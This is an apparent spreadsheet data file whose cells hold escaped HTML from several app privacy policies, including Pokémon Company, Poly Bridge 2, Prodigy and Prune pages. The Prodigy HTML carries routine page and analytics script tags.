                        &lt;li&gt;We use appropriate technological and operational security measures to protect your information against unauthorized access or unlawful use. &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;We will retain your information for as long as is appropriate to provide you with the services that you have requested from us or for as long as we reasonably require to retain the information for our lawful business purposes, such as for legal compliance and enforcement purposes, and for resolving disputes. Actual retention periods depend on a variety of factors such as the type of product, the type and sensitivity of the data, business needs, customer expectations and needs, the types of available user controls, and the form in which the data is stored.&lt;/li&gt;_x005F_x000D_
                    &lt;/ol&gt;_x005F_x000D_
				&lt;/div&gt;_x005F_x000D_
				&lt;!----&gt;_x005F_x000D_
_x005F_x000D_
				&lt;div class="block__item" id="en_8"&gt;_x005F_x000D_
					&lt;h2&gt;8.</t>
  </si>
  <si>
    <t>INTERNATIONAL TRANSFERS OF YOUR INFORMATION&lt;/h2&gt;_x005F_x000D_
					&lt;ol&gt;_x005F_x000D_
                        &lt;li&gt;Our company is located in Japan, and the personal information that we collect from you will predominantly be stored in Ireland, Japan, and the USA. This will involve a transfer of data outside the EEA.&lt;/li&gt;_x005F_x000D_
                        &lt;li&gt; Whenever we transfer your personal data from inside the EEA out of the EEA, we ensure a similar degree of protection is afforded to it by ensuring at least one of the following transfer solutions is implemented:_x005F_x000D_
                            &lt;ol&gt;_x005F_x000D_
                                &lt;li&gt;Where we use certain service providers, we may use specific contracts approved by the European Commission which give personal data the same protection it has in Europe.</t>
  </si>
  <si>
    <t xml:space="preserve">For further details, see European Commission: Model contracts for the transfer of personal data to third countries; and&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;Where we use providers based in the USA, we may transfer data to them if they are part of the Privacy Shield, which requires them to provide similar protection to personal data shared between Europe and the USA. For further details, see European Commission: EU-US Privacy Shield.&lt;/li&gt;_x005F_x000D_
                            &lt;/ol&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;Please contact us using the contact details at the top of this Privacy Notice if you want further information on the specific mechanism used by us when transferring your personal data out of the EEA.&lt;/li&gt;_x005F_x000D_
                    &lt;/ol&gt;_x005F_x000D_
				&lt;/div&gt;_x005F_x000D_
				&lt;!----&gt;_x005F_x000D_
_x005F_x000D_
				&lt;div class="block__item" id="en_9"&gt;_x005F_x000D_
					&lt;h2&gt;9. THE RIGHTS OF USERS IN THE EU&lt;/h2&gt;_x005F_x000D_
					&lt;ol&gt;_x005F_x000D_
                        &lt;li&gt;If you are in the EU, you have certain rights in respect of the information that we hold about you, including: _x005F_x000D_
                        &lt;ol&gt;_x005F_x000D_
                            &lt;li&gt;the right to be informed of the ways in which we use your information, as we seek to do in this Privacy Notice;&lt;/li&gt;_x005F_x000D_
                            &lt;li&gt;the right to ask us not to process your personal data for marketing purposes; &lt;/li&gt;_x005F_x000D_
                            &lt;li&gt;the right to request access to the information that we hold about you; &lt;/li&gt;_x005F_x000D_
                            &lt;li&gt;the right to request that we correct or rectify any information that we hold about you which is out of date or incorrect; &lt;/li&gt;_x005F_x000D_
                            </t>
  </si>
  <si>
    <t>&lt;li&gt;in certain circumstances, the right to ask us to stop processing information about you; and&lt;/li&gt;_x005F_x000D_
                            &lt;li&gt;the right to lodge a complaint about us with the UK Information Commissioner’s Office (https://ico.org.uk/). &lt;/li&gt;_x005F_x000D_
                        &lt;/ol&gt;_x005F_x000D_
                            Please note that we may need to retain certain information for our own record-keeping and research purposes. We may also need to send you service-related communications relating to your website user account even when you have requested not to receive marketing communications.</t>
  </si>
  <si>
    <t>_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt; In accordance with new data protection laws which are in force from May 25, 2018, you have certain additional rights in respect of the information that we hold about you, including:_x005F_x000D_
                        &lt;ol&gt;_x005F_x000D_
                            &lt;li&gt;in addition to your right to lodge a complaint about us with the UK Information Commissioner’s Office (https://ico.org.uk/), you are also able to lodge a complaint with the relevant authority in your country of work or residence; &lt;/li&gt;   _x005F_x000D_
                            &lt;li&gt;the right to withdraw your consent for our use of your information in reliance of your consent, which you can do by contacting us using any of the details at the top of this Privacy Notice; &lt;/li&gt;_x005F_x000D_
                            &lt;li&gt;the right to object to our using your information on the basis of our legitimate interests and there is something about your particular situation which makes you want to object to processing on this ground;&lt;/li&gt;_x005F_x000D_
                            &lt;li&gt;the right to receive a copy of any information we hold about you (or request that we transfer this to another service provider) in a structured, commonly used, machine-readable format, in certain circumstances; and&lt;/li&gt;_x005F_x000D_
                            &lt;li&gt;the right to ask us to limit or cease processing or erase information we hold about you, in certain circumstances.&lt;/li&gt;_x005F_x000D_
                        &lt;/ol&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;You may exercise your rights above by contacting us using the details in paragraph 2 of this Privacy Notice, or to stop receiving push notifications you can update your preferences in your device settings.&lt;/li&gt;_x005F_x000D_
                    &lt;/ol&gt;_x005F_x000D_
_x005F_x000D_
				&lt;/div&gt;_x005F_x000D_
				&lt;!----&gt;_x005F_x000D_
_x005F_x000D_
				&lt;div class="block__item" id="en_10"&gt;_x005F_x000D_
					&lt;h2&gt;10. THIRD-PARTY LINKS&lt;/h2&gt;_x005F_x000D_
					&lt;p&gt;Our App may include links to third-party websites, plug-ins and apps.</t>
  </si>
  <si>
    <t>Clicking on those links or enabling those connections may allow third parties to collect or share data about you. We do not control these third-party websites, plug-ins and apps and are not responsible for their privacy statements. When you leave our website, we encourage you to read the privacy notice of every third party you visit.&lt;/p&gt;_x005F_x000D_
				&lt;/div&gt;_x005F_x000D_
				&lt;!----&gt;_x005F_x000D_
    _</t>
  </si>
  <si>
    <t>x000D_
				&lt;div class="block__item" id="en_11"&gt;_x005F_x000D_
					&lt;h2&gt;11. WHAT TYPES OF INFORMATION DO WE COLLECT ABOUT CHILDREN?&lt;/h2&gt;_x005F_x000D_
					&lt;ol&gt;_x005F_x000D_
                        &lt;li&gt;If a user has indicated that they are a child when trying to use our App, we will direct the child to a different experience within our App that lets a child use our services much like any other user but that does not allow any additional personal information (as defined under COPPA) to be collected.   &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;We collect only a subset of the personal information above when a user identifies themselves as a child, including username and unique identifiers.</t>
  </si>
  <si>
    <t>Children can use our App, view content, and enjoy many features without collection of any personal information (as defined under COPPA).&lt;/li&gt;_x005F_x000D_
                    &lt;/ol&gt;_x005F_x000D_
				&lt;/div&gt;_x005F_x000D_
				&lt;!----&gt;_x005F_x000D_
    _ x000D_
				&lt;div class="block__item" id="en_12"&gt;_x005F_x000D_
					&lt;h2&gt;12. DATA PROTECTION OFFICER&lt;/h2&gt;_x005F_x000D_
					&lt;p&gt;</t>
  </si>
  <si>
    <t>If you wish to contact our Data Protection Officer, please use the following details:&lt;/p&gt;_x005F_x000D_
                        &lt;div class="box"&gt;_x005F_x000D_
                        The Pokémon Company &lt;br&gt;_x005F_x000D_
                        Attention: Data Protection Officer&lt;br&gt;_x005F_x000D_
                        Address: Roppongi Hills Mori Tower 8F&lt;br&gt;_x005F_x000D_
                         6-10-1 Roppongi, Minato-ku&lt;br&gt;_x005F_x000D_
                          Tokyo 106-6108 Japan_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
				&lt;/div&gt;_x005F_x000D_
    _ x000D_
_</t>
  </si>
  <si>
    <t>x000D_
				&lt;div class="block__item" id="en_13"&gt;_x005F_x000D_
					&lt;h2&gt;13. CHANGES TO THIS PRIVACY NOTICE AND YOUR DUTY TO INFORM US OF CHANGES&lt;/h2&gt;_x005F_x000D_
					&lt;p&gt;We may amend this Privacy Notice at any time by changing the last updated date. If we make material changes to how we collect, use, or share your personal information, we will describe the changes, and, if required by law, seek your consent for such changes.&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">It is important that the personal data we hold about you is accurate and current. Please keep us informed if your personal data changes during your relationship with us by updating your profile account information or contacting us via the contact details at the top of this Privacy Notice. This Privacy Notice was updated on June 27, 2018.&lt;/p&gt;_x005F_x000D_
				&lt;/div&gt;_x005F_x000D_
				&lt;!----&gt;_x005F_x000D_
				_x005F_x000D_
				&lt;div class="block__item" id="en_ccpa"&gt;_x005F_x000D_
					&lt;h2&gt;SUPPLEMENTAL CALIFORNIA PRIVACY RIGHTS &lt;/h2&gt;_x005F_x000D_
					&lt;p&gt;_x005F_x000D_
						</t>
  </si>
  <si>
    <t>Last updated [December 25, 2019]&lt;br&gt;_x005F_x000D_
						 Effective January 1, 2020&lt;br&gt;_x005F_x000D_
					&lt;/p&gt;_x005F_x000D_
					&lt;p&gt; This section provides you with additional disclosures required under California law, and should be reviewed in conjunction with the Services’ general Privacy Notice before using the App (“Services”).</t>
  </si>
  <si>
    <t>&lt;/p&gt;_x005F_x000D_
					&lt;ol&gt;_x005F_x000D_
						&lt;li&gt;If you are a California consumer whose personal information is collected through the Services (“customer”), the California Consumer Privacy Act (“CCPA”) provides you with certain rights in respect to that personal information. In particular, you have a right to request that companies provide you with the following information:&lt;br&gt;&lt;/li&gt;_x005F_x000D_
						&lt;p&gt;(a) The categories and specific pieces of personal information we have collected about you.&lt;/p&gt;_x005F_x000D_
						&lt;p&gt;(b)</t>
  </si>
  <si>
    <t xml:space="preserve">The categories or sources from which we collect personal information.&lt;/p&gt;_x005F_x000D_
						&lt;p&gt;(c) The purposes for collecting and using personal information.&lt;/p&gt;_x005F_x000D_
			</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;
    &lt;html&gt;
    &lt;head&gt;
      &lt;meta charset='utf-8'&gt;
      &lt;meta name='viewport' content='width=device-width'&gt;
      &lt;title&gt;Privacy Policy&lt;/title&gt;
      &lt;style&gt; body { font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; padding:1em; } &lt;/style&gt;
    &lt;/head&gt;
    &lt;body&gt;
    &lt;strong&gt;Privacy Policy&lt;/strong&gt; &lt;p&gt;
                   Dry Cactus Limited built the Poly Bridge 2 app as
                  a Commercial app. This SERVICE is provided by
                  Dry Cactus Limited and is intended for use as
                  is.
                </t>
  </si>
  <si>
    <t>&lt;/p&gt; &lt;p&gt;
                   This page is used to inform visitors regarding our
                  policies with the collection, use, and disclosure of Personal
                  Information if anyone decided to use our Service.
                 &lt;/p&gt; &lt;p&gt;
                  If you choose to use our Service, then you agree to
                  the collection and use of information in relation to this
                  policy.</t>
  </si>
  <si>
    <t xml:space="preserve">The Personal Information that we collect is
                  used for providing and improving the Service. We will not use or share your information with
                  anyone except as described in this Privacy Policy.
                 &lt;/p&gt; &lt;p&gt;
                  </t>
  </si>
  <si>
    <t>The terms used in this Privacy Policy have the same meanings
                  as in our Terms and Conditions, which is accessible at
                  Poly Bridge 2 unless otherwise defined in this Privacy Policy.
                 &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Information Collection and Use&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
                   For a better experience, while using our Service, we
                  may require you to provide us with certain personally
                  identifiable information.</t>
  </si>
  <si>
    <t xml:space="preserve">The information that
                  we request will be retained by us and used as described in this privacy policy.
                 &lt;/p&gt; &lt;div&gt;&lt;p&gt;
                    </t>
  </si>
  <si>
    <t xml:space="preserve">The app does use third party services that may collect
                    information used to identify you.
                   &lt;/p&gt; &lt;p&gt;
                    Link to privacy policy of third party service providers used
                    by the app
                  &lt;/p&gt; &lt;ul&gt;&lt;li&gt;&lt;a href="https://www.google.com/policies/privacy/" target="_blank" rel="noopener noreferrer"&gt;Google Play Services&lt;/a&gt;&lt;/li&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;/ul&gt;&lt;/div&gt; &lt;p&gt;&lt;strong&gt;Log Data&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
                  </t>
  </si>
  <si>
    <t>We want to inform you that whenever you
                  use our Service, in a case of an error in the app
                  we collect data and information (through third party
                  products) on your phone called Log Data. This Log Data may
                  include information such as your device Internet Protocol
                  (“IP”) address, device name, operating system version, the
                  configuration of the app when utilizing our Service,
                  the time and date of your use of the Service, and other
                  statistics.
                 &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Cookies&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
                  Cookies are files with a small amount of data that are
                  commonly used as anonymous unique identifiers.</t>
  </si>
  <si>
    <t>These are sent
                  to your browser from the websites that you visit and are
                  stored on your device's internal memory.
                 &lt;/p&gt; &lt;p&gt;
                   This Service does not use these “cookies” explicitly.</t>
  </si>
  <si>
    <t xml:space="preserve">However,
                  the app may use third party code and libraries that use
                  “cookies” to collect information and improve their services.
                   You have the option to either accept or refuse these cookies
                  and know when a cookie is being sent to your device. If you
                  choose to refuse our cookies, you may not be able to use some
                  portions of this Service.
                </t>
  </si>
  <si>
    <t>&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Service Providers&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
                  We may employ third-party companies and
                  individuals due to the following reasons:
                &lt;/p&gt; &lt;ul&gt;&lt;li&gt;To facilitate our Service;&lt;/li&gt; &lt;li&gt;To provide the Service on our behalf;&lt;/li&gt; &lt;li&gt;To perform Service-related services; or&lt;/li&gt; &lt;li&gt;To assist us in analyzing how our Service is used.&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;
                   We want to inform users of this Service
                  that these third parties have access to your Personal
                  Information.</t>
  </si>
  <si>
    <t xml:space="preserve">The reason is to perform the tasks assigned to
                  them on our behalf. However, they are obligated not to
                  disclose or use the information for any other purpose.
                 &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Security&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
                  </t>
  </si>
  <si>
    <t xml:space="preserve">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&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Links to Other Sites&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
                  </t>
  </si>
  <si>
    <t xml:space="preserve">This Service may contain links to other sites. If you click on
                  a third-party link, you will be directed to that site. Note
                  that these external sites are not operated by us.
                  </t>
  </si>
  <si>
    <t xml:space="preserve">Therefore, we strongly advise you to review the
                  Privacy Policy of these websites. We have
                  no control over and assume no responsibility for the content,
                  privacy policies, or practices of any third-party sites or
                  services.
                 &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Children’s Privacy&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
                  These Services do not address anyone under the age of 13.
                  </t>
  </si>
  <si>
    <t xml:space="preserve">We do not knowingly collect personally
                  identifiable information from children under 13. In the case
                  we discover that a child under 13 has provided
                  us with personal information, we immediately
                  delete this from our servers. If you are a parent or guardian
                  and you are aware that your child has provided us with
                  personal information, please contact us so that
                  we will be able to do necessary actions.
                </t>
  </si>
  <si>
    <t>&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Changes to This Privacy Policy&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
                   We may update our Privacy Policy from
                  time to time.</t>
  </si>
  <si>
    <t>Thus, you are advised to review this page
                  periodically for any changes. We will
                  notify you of any changes by posting the new Privacy Policy on
                  this page.
                 &lt;/p&gt; &lt;p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">This policy is effective as of 2020-10-11&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Contact Us&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
                  If you have any questions or suggestions about our
                  Privacy Policy, do not hesitate to contact us at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="c1b2b4b1b1aeb3b581a5b3b8a2a0a2b5b4b2efa2aeac"&gt;[email&amp;#160;protected]&lt;/a&gt;
                &lt;/p&gt;
    &lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;/body&gt;
    &lt;/html&gt;
      </t>
  </si>
  <si>
    <t>css2?family=Montserrat:wght@100;300;400;600;700&amp;display=swap" rel="stylesheet"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/cookieconsent.css?v=1681341650"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/master.min.css?v=1681341650"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</si>
  <si>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html&gt;&lt;html&gt;&lt;head&gt;&lt;meta charSet="utf-8"/&gt;&lt;meta http-equiv="x-ua-compatible" content="ie=edge"/&gt;&lt;meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/&gt;&lt;meta name="generator" content="Gatsby 4.25.4"/&gt;&lt;meta data-react-helmet="true" http-equiv="refresh" content="0; URL=/main-en/privacy-policy" link="[object Object]"/&gt;&lt;style data-styled="" data-styled-version="5.3.6"&gt;&lt;/style&gt;&lt;link rel="preconnect" href="https://instagram.com"/&gt;&lt;style&gt;.gatsby-image-wrapper{position:relative;overflow:hidden}.gatsby-image-wrapper picture.object-fit-polyfill{position:static!important}.gatsby-image-wrapper img{bottom:0;height:100%;left:0;margin:0;max-width:none;padding:0;position:absolute;right:0;top:0;width:100%;object-fit:cover}.gatsby-image-wrapper [data-main-image]{opacity:0;transform:translateZ(0);transition:opacity .25s linear;will-change:opacity}.gatsby-image-wrapper-constrained{display:inline-block;vertical-align:top}&lt;/style&gt;&lt;noscript&gt;&lt;style&gt;.gatsby-image-wrapper noscript [data-main-image]{opacity:1!important}.gatsby-image-wrapper [data-placeholder-image]{opacity:0!important}&lt;/style&gt;&lt;/noscript&gt;&lt;script type="module"&gt;const e="undefined"!=typeof HTMLImageElement&amp;&amp;"loading"in HTMLImageElement.prototype;e&amp;&amp;document.body.addEventListener("load",(function(e){const t=e.target;if(void 0===t.dataset.mainImage)return;if(void 0===t.dataset.gatsbyImageSsr)return;let a=null,n=t;for(;null===a&amp;&amp;n;)void 0!==n.parentNode.dataset.gatsbyImageWrapper&amp;&amp;(a=n.parentNode),n=n.parentNode;const o=a.querySelector("[data-placeholder-image]"),r=new Image;r.src=t.currentSrc,r.decode().catch((()=&gt;{})).then((()=&gt;{t.style.opacity=1,o&amp;&amp;(o.style.opacity=0,o.style.transition="opacity 500ms linear")}))}),!0);&lt;/script&gt;&lt;link rel="sitemap" type="application/xml" href="https://webcdn.prodigygame.com/fba194c-1277/main-en/sitemap-index.xml"/&gt;&lt;link rel="sitemap" type="application/xml" href="https://webcdn.prodigygame.com/fba194c-1277/in-en/sitemap-index.xml"/&gt;&lt;link rel="sitemap" type="application/xml" href="https://webcdn.prodigygame.com/fba194c-1277/sitemap-index.xml"/&gt;&lt;script data-domain-script="3cc573d6-adfa-4a74-801b-dec23adaa3f9" id="one-trust-id-cdn" src="https://cdn.cookielaw.org/scripttemplates/otSDKStub.js" type="text/javascript"&gt;&lt;/script&gt;&lt;script id="one-trust-id-script-content"&gt;function OptanonWrapper() {}&lt;/script&gt;&lt;script class="optanon-category-C0002" id="optimizely-id-cdn" src="https://cdn.optimizely.com/js/14072380213.js"&gt;&lt;/script&gt;&lt;script class="optanon-category-C0003" id="segment-id-analytics" type="text/plain"&gt;!(function(){var analytics=(window.analytics=window.analytics||[]);if(!analytics.initialize){if(analytics.invoked){window.console&amp;&amp;console.error&amp;&amp;console.error("Segment snippet included twice.</t>
  </si>
  <si>
    <t>")}else{analytics.invoked=!0;analytics.methods=["trackSubmit","trackClick","trackLink","trackForm","pageview","identify","reset","group","track","ready","alias","debug","page","once","off","on","addSourceMiddleware","addIntegrationMiddleware","setAnonymousId","addDestinationMiddleware"];analytics.factory=function(e){return function(){var t=Array.prototype.slice.call(arguments);t.unshift(e);analytics.push(t);return analytics}};for(var e=0;e&lt;analytics.methods.length;e+=1){var key=analytics.methods[e];analytics[key]=analytics.factory(key)}analytics.load=function(key,e){var t=document.createElement("script");t.async=!0;t.src="https://cdn.segment.io/analytics.js/v1/"+key+"/analytics.min.js";var n=document.getElementsByTagName("script")[0];n.parentNode.insertBefore(t,n);analytics._loadOptions=e};analytics._segmentWriteKey="FGtHEL1720jc0xCCajO8LcrgjlaHy2cu";analytics.SNIPPET_VERSION="4.15.3";analytics.load("FGtHEL1720jc0xCCajO8LcrgjlaHy2cu");analytics.page()}}})();&lt;/script&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/ABeeZee-Regular.woff" rel="preload" type="font/woff"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/ABeeZee-Regular.woff2" rel="preload" type="font/woff2"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/PaytoneOne-Regular.woff" rel="preload" type="font/woff"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/PaytoneOne-Regular.woff2" rel="preload" type="font/woff2"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/QuickBrush-Web.woff" rel="preload" type="font/woff"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/QuickBrush-Web.woff2" rel="preload" type="font/woff2"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/WorkSans-Bold.woff" rel="preload" type="font/woff"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/WorkSans-Bold.woff2" rel="preload" type="font/woff2"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/WorkSans-Medium.woff" rel="preload" type="font/woff"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/WorkSans-Medium.woff2" rel="preload" type="font/woff2"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/WorkSans-Regular.woff" rel="preload" type="font/woff"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/WorkSans-Regular.woff2" rel="preload" type="font/woff2"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/WorkSans-SemiBold.woff" rel="preload" type="font/woff"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/WorkSans-SemiBold.woff2" rel="preload" type="font/woff2"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/ProdigySans-Bold.woff" rel="preload" type="font/woff"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/ProdigySans-Bold.woff2" rel="preload" type="font/woff2"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/ProdigySans-Medium.woff" rel="preload" type="font/woff"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/ProdigySans-Medium.woff2" rel="preload" type="font/woff2"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/ProdigySans-Regular.woff" rel="preload" type="font/woff"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/ProdigySans-Regular.woff2" rel="preload" type="font/woff2"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/ProdigySans-SemiBold.woff" rel="preload" type="font/woff"/&gt;&lt;link as="font" crossorigin="anonymous" href="/fonts/ProdigySans-SemiBold.woff2" rel="preload" type="font/woff2"/&gt;&lt;/head&gt;&lt;body&gt;&lt;div id="___gatsby"&gt;&lt;div style="outline:none" tabindex="-1" id="gatsby-focus-wrapper"&gt;&lt;/div&gt;&lt;div id="gatsby-announcer" style="position:absolute;top:0;width:1px;height:1px;padding:0;overflow:hidden;clip:rect(0, 0, 0, 0);white-space:nowrap;border:0" aria-live="assertive" aria-atomic="true"&gt;&lt;/div&gt;&lt;/div&gt;&lt;script&gt;
        window.gatsbyLoadInstagram = function() {
          var js = document.createElement('script');
          var firstScript = document.getElementsByTagName('script')[0];
          js.id = 'gatsby-plugin-instagram';
          js.src = 'https://instagram.com/embed.js';
          firstScript.parentNode.insertBefore(js, firstScript);
          return true;
        }
      &lt;/script&gt;&lt;script src="https://cdn.polyfill.io/v3/polyfill.min.js?features=Array.prototype.map,Object.entries,fetch,String.prototype.includes,Array.prototype.includes,Array.prototype.find,URLSearchParams"&gt;&lt;/script&gt;&lt;div id="portal"&gt;&lt;/div&gt;&lt;script id="gatsby-script-loader"&gt;/*&lt;![CDATA[*/window.pagePath="/Privacy-Policy/";window.___webpackCompilationHash="4d46135ae0f451304bfe";/*]]&gt;*/&lt;/script&gt;&lt;script id="gatsby-chunk-mapping"&gt;/*&lt;![CDATA[*/window.___chunkMapping={"polyfill":["/polyfill-589baf0f187e156ec32a.js"],"app":["/app-67e0f367d3297995b686.js"],"component---src-pages-404-in-en-js":["/component---src-pages-404-in-en-js-362727a6a08db33d4110.js"],"component---src-pages-404-js":["/component---src-pages-404-js-3aa9f7f9c7879953f1d8.js"],"component---src-pages-404-main-en-js":["/component---src-pages-404-main-en-js-2711f75b7be60da85089.js"],"component---src-pages-index-js":["/component---src-pages-index-js-4bdb262959d0645b9024.js"],"component---src-pages-index-main-en-js":["/component---src-pages-index-main-en-js-a3846530471d885b26ae.js"],"component---src-pages-math-curriculum-standards-index-js":["/component---src-pages-math-curriculum-standards-index-js-7218f1f334645746fd56.js"],"component---src-pages-math-curriculum-standards-index-main-en-js":["/component---src-pages-math-curriculum-standards-index-main-en-js-f21b1b9a5c02b726e49b.js"],"component---src-templates-blog-articles-index-js":["/component---src-templates-blog-articles-index-js-fc2960ee6474c7465fe4.js"],"component---src-templates-blog-index-js":["/component---src-templates-blog-index-js-c255cb697b5df2d4e11d.js"],"component---src-templates-careers-blog-articles-index-js":["/component---src-templates-careers-blog-articles-index-js-57f5d54ae242e2f232d2.js"],"component---src-templates-default-index-js":[],"component---src-templates-job-filtering-index-js":["/component---src-templates-job-filtering-index-js-2edb6aa01242ba8a11f7.js"],"component---src-templates-job-post-index-js":["/component---src-templates-job-post-index-js-2e23bc5944f95ed94e65.js"],"component---src-templates-legal-index-js":["/component---src-templates-legal-index-js-21b2f7ef8d51866abee5.js"],"component---src-templates-redirect-index-js":["/component---src-templates-redirect-index-js-7cbf5be05578f952a4cd.js"]};/*]]&gt;*/&lt;/script&gt;&lt;script src="https://webcdn.prodigygame.com/fba194c-1277/polyfill-589baf0f187e156ec32a.js" nomodule=""&gt;&lt;/script&gt;&lt;script src="https://webcdn.prodigygame.com/fba194c-1277/app-67e0f367d3297995b686.js" async=""&gt;&lt;/script&gt;&lt;script src="https://webcdn.prodigygame.com/fba194c-1277/dc6a8720040df98778fe970bf6c000a41750d3ae-77b6d88290b4efc7f1e7.js" async=""&gt;&lt;/script&gt;&lt;script src="https://webcdn.prodigygame.com/fba194c-1277/framework-b8fb8f51682d353a7d73.js" async=""&gt;&lt;/script&gt;&lt;script src="https://webcdn.prodigygame.com/fba194c-1277/webpack-runtime-7db765fd16d6a6b12221.js" async=""&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"&gt;_x005F_x000D_
&lt;!-- HEADER --&gt;_x005F_x000D_
&lt;html dir="ltr" lang="en"&gt;_x005F_x000D_
&lt;head&gt;_x005F_x000D_
    &lt;meta charset="UTF-8"&gt;_x005F_x000D_
    &lt;title&gt;Prune - Privacy&lt;/title&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!-- META --&gt;_x005F_x000D_
    &lt;meta name="description" content="Cultivate what matters.</t>
  </si>
  <si>
    <t>Cut away the rest. "&gt;_x005F_x000D_
    &lt;meta name="keywords" content="prune, indie, zen iOS, iPad, iPhone, polyculture, Joel McDonald"&gt;_x005F_x000D_
    &lt;meta name="author" content="Joel McDonald"&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!-- CSS --&gt;_x005F_x000D_
    &lt;link href="css/main.css" rel="stylesheet" type='text/css'&gt;_x005F_x000D_
    &lt;link href="lightbox/css/lightbox.css" rel="stylesheet" type='text/css'&gt;_x005F_x000D_
    &lt;link href='http://fonts.googleapis.com/css?family=Droid+Serif' rel='stylesheet' type='text/css'&gt;_x005F_x000D_
    &lt;link href='http://fonts.googleapis.com/ css?family=Amatic+SC:300' rel='stylesheet' type='text/css'&gt;_x005F_x000D_
    &lt;link href='http://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Raleway:500,600,700,100,400,200,300' rel='stylesheet' type='text/css'&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!-- JS --&gt;_x005F_x000D_
    &lt;script src="lightbox/js/jquery-1.11.0.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="lightbox/js/lightbox.min.js"&gt;&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!-- FAVICON --&gt;_x005F_x000D_
    &lt;link rel="shortcut icon" href="img/favicon.ico" /&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!--</t>
  </si>
  <si>
    <t>FACEBOOK --&gt;_x005F_x000D_
    &lt;meta property="og:title" content="Prune" /&gt;_x005F_x000D_
    &lt;meta property="og:type" content="website" /&gt;_x005F_x000D_
    &lt;meta property="og:image" content="http://www.prunegame.com/img/thumbnail_fb.jpg" /&gt;_x005F_x000D_
    &lt;meta property="og:url" content="http://www.prunegame.com" /&gt;_x005F_x000D_
    &lt;meta property="og:description" content="Cultivate what matters. Cut away the rest." /&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!--</t>
  </si>
  <si>
    <t>TWITTER --&gt;_x005F_x000D_
    &lt;meta name="twitter:card" content="summary"&gt;_x005F_x000D_
    &lt;meta name="twitter:url" content="http://www.prunegame.com"&gt;_x005F_x000D_
    &lt;meta name="twitter:title" content="Prune"&gt;_x005F_x000D_
     &lt;meta name="twitter:description" content="Cultivate what matters. Cut away the rest.</t>
  </si>
  <si>
    <t xml:space="preserve">"&gt;_x005F_x000D_
